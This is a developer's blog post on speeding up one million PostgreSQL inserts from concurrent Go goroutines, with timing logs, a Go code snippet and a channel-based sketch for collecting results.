Gopher Id: 17 || StopTime: 2013-10-30 14:42:35.642630072 -0700 PDT
Gopher Id: 4 || StopTime: 2013-10-30 14:42:35.660139502 -0700 PDT
Gopher Id: 10 || StopTime: 2013-10-30 14:42:35.67527849 -0700 PDT
Gopher Id: 13 || StopTime: 2013-10-30 14:42:35.685175774 -0700 PDT
Gopher Id: 9 || StopTime: 2013-10-30 14:42:35.69144017 -0700 PDT
Gopher Id: 0 || StopTime: 2013-10-30 14:42:35.729137844 -0700 PDT
Gopher Id: 1 || StopTime: 2013-10-30 14:42:35.749108884 -0700 PDT
Gopher Id: 2 || StopTime: 2013-10-30 14:42:35.770752277 -0700 PDT
Gopher Id: 7 || StopTime: 2013-10-30 14:42:35.777471603 -0700 PDT
Gopher Id: 8 || StopTime: 2013-10-30 14:42:35.780713859 -0700 PDT
Gopher Id: 19 || StopTime: 2013-10-30 14:42:35.783338736 -0700 PDT
Gopher Id: 11 || StopTime: 2013-10-30 14:42:35.794922546 -0700 PDT
Gopher Id: 14 || StopTime: 2013-10-30 14:42:35.799124142 -0700 PDT
Gopher Id: 5 || StopTime: 2013-10-30 14:42:35.800538715 -0700 PDT
Gopher Id: 12 || StopTime: 2013-10-30 14:42:35.802006822 -0700 PDT
Gopher Id: 18 || StopTime: 2013-10-30 14:42:35.806211023 -0700 PDT
Gopher Id: 16 || StopTime: 2013-10-30 14:42:35.817042445 -0700 PDT
Gopher Id: 15 || StopTime: 2013-10-30 14:42:35.824304999 -0700 PDT

With a tiny golang program, we now have 1 million writes taking 1 minute and 44 seconds. Friggin sweet.

UPDATE 2: Thanks to corvinusz for pointing this out. By simply moving our Prepare call outside of the for loop, we can now insert 1M records in 44 seconds. Thanks dude!

 
...snip...
 
func gopher(gopher_id int, sStmt string) {
 
  // lazily open db (doesn't truly open until first request)
  db, err := sql.Open("postgres","host=localhost dbname=testdb sslmode=disable")
  if err != nil {
    log.Fatal(err)
  }
 
  stmt, err := db.Prepare(sStmt)
  if err != nil {
    log.Fatal(err)
  }
 
  fmt.Printf("Gopher Id: %v \t|| StartTime: %v\n",gopher_id, time.Now())
 
 
  for i := 0; i < entries; i++ {
 
 
    res, err := stmt.Exec(gopher_id, time.Now())
    if err != nil || res == nil {
      log.Fatal(err)
    }
 
 
  }
 
  stmt.Close()
  // close db
  db.Close()
 
  fmt.Printf("Gopher Id: %v \t|| StopTime: %v\n",gopher_id, time.Now())
 
}
 
...snip...
And the results:

$ ./test_many_pool
Gopher Id: 8 	|| StartTime: 2013-10-31 08:52:45.56084829 -0700 PDT
Gopher Id: 6 	|| StartTime: 2013-10-31 08:52:45.561137992 -0700 PDT
Gopher Id: 12 	|| StartTime: 2013-10-31 08:52:45.561215818 -0700 PDT
Gopher Id: 4 	|| StartTime: 2013-10-31 08:52:45.561288387 -0700 PDT
Gopher Id: 7 	|| StartTime: 2013-10-31 08:52:45.56135501 -0700 PDT
Gopher Id: 15 	|| StartTime: 2013-10-31 08:52:45.56148435 -0700 PDT
Gopher Id: 2 	|| StartTime: 2013-10-31 08:52:45.562015828 -0700 PDT
Gopher Id: 17 	|| StartTime: 2013-10-31 08:52:45.562434107 -0700 PDT
Gopher Id: 13 	|| StartTime: 2013-10-31 08:52:45.562872507 -0700 PDT
Gopher Id: 19 	|| StartTime: 2013-10-31 08:52:45.564599961 -0700 PDT
Gopher Id: 0 	|| StartTime: 2013-10-31 08:52:45.567561345 -0700 PDT
Gopher Id: 1 	|| StartTime: 2013-10-31 08:52:45.568002729 -0700 PDT
Gopher Id: 3 	|| StartTime: 2013-10-31 08:52:45.568259325 -0700 PDT
Gopher Id: 10 	|| StartTime: 2013-10-31 08:52:45.569216209 -0700 PDT
Gopher Id: 9 	|| StartTime: 2013-10-31 08:52:45.569317516 -0700 PDT
Gopher Id: 11 	|| StartTime: 2013-10-31 08:52:45.569604124 -0700 PDT
Gopher Id: 14 	|| StartTime: 2013-10-31 08:52:45.572600335 -0700 PDT
Gopher Id: 16 	|| StartTime: 2013-10-31 08:52:45.574639425 -0700 PDT
Gopher Id: 18 	|| StartTime: 2013-10-31 08:52:45.576122518 -0700 PDT
Gopher Id: 5 	|| StartTime: 2013-10-31 08:52:45.577174648 -0700 PDT
Gopher Id: 5 	|| StopTime: 2013-10-31 08:53:28.156243751 -0700 PDT
Gopher Id: 14 	|| StopTime: 2013-10-31 08:53:28.240175919 -0700 PDT
Gopher Id: 9 	|| StopTime: 2013-10-31 08:53:28.247910193 -0700 PDT
Gopher Id: 1 	|| StopTime: 2013-10-31 08:53:28.313724365 -0700 PDT
Gopher Id: 10 	|| StopTime: 2013-10-31 08:53:28.372717602 -0700 PDT
Gopher Id: 16 	|| StopTime: 2013-10-31 08:53:28.389852733 -0700 PDT
Gopher Id: 15 	|| StopTime: 2013-10-31 08:53:28.434203629 -0700 PDT
Gopher Id: 19 	|| StopTime: 2013-10-31 08:53:28.470070067 -0700 PDT
Gopher Id: 18 	|| StopTime: 2013-10-31 08:53:28.486355611 -0700 PDT
Gopher Id: 4 	|| StopTime: 2013-10-31 08:53:28.505530435 -0700 PDT
Gopher Id: 8 	|| StopTime: 2013-10-31 08:53:28.507830911 -0700 PDT
Gopher Id: 3 	|| StopTime: 2013-10-31 08:53:28.520788665 -0700 PDT
Gopher Id: 11 	|| StopTime: 2013-10-31 08:53:28.545292303 -0700 PDT
Gopher Id: 13 	|| StopTime: 2013-10-31 08:53:28.585376452 -0700 PDT
Gopher Id: 0 	|| StopTime: 2013-10-31 08:53:28.587530913 -0700 PDT
Gopher Id: 7 	|| StopTime: 2013-10-31 08:53:28.598791481 -0700 PDT
Gopher Id: 2 	|| StopTime: 2013-10-31 08:53:28.605832957 -0700 PDT
Gopher Id: 12 	|| StopTime: 2013-10-31 08:53:28.61655187 -0700 PDT
Gopher Id: 17 	|| StopTime: 2013-10-31 08:53:28.616684023 -0700 PDT
Gopher Id: 6 	|| StopTime: 2013-10-31 08:53:28.618116313 -0700 PDT

Something to call out is that we are basically shoving our data into a black hole. We have no idea if the inserts completed successfully. Yes, there is some error logic, but not enough. We are using Go to have our application function in a parallel state, or as Rob might say:

“The concurrent composition of 10 gophers inserting data into a database”

 

Rob, in his talk, goes on to mention channels, which are the logical next step for message passing here. This would bring our application into a concurrent state; if people are interested, hit me up @jaredfolkins and let me know that I should post more about this.
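
As a rough sketch of what that next step could look like (my own illustration, not code from the original tests): give each gopher a channel to report back on and have main wait for all of them instead of blocking on fmt.Scanln. The doInsert stub stands in for the Prepare/Exec work so the sketch runs without a database.

package main

import (
  "fmt"
  "time"
)

const (
  gophers = 10
  entries = 5
)

// doInsert stands in for stmt.Exec so this sketch runs without Postgres;
// in the real program it would return the error from the insert.
func doInsert(gopherID, row int) error {
  time.Sleep(time.Millisecond)
  return nil
}

func main() {
  // One buffered channel for the gophers to report their failure counts on.
  results := make(chan int, gophers)

  for g := 0; g < gophers; g++ {
    go func(id int) {
      failed := 0
      for i := 0; i < entries; i++ {
        if err := doInsert(id, i); err != nil {
          failed++
        }
      }
      results <- failed // report back instead of just printing
    }(g)
  }

  // Receive exactly one result per gopher; this replaces fmt.Scanln.
  totalFailed := 0
  for g := 0; g < gophers; g++ {
    totalFailed += <-results
  }
  fmt.Printf("all gophers done, %d failed inserts\n", totalFailed)
}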
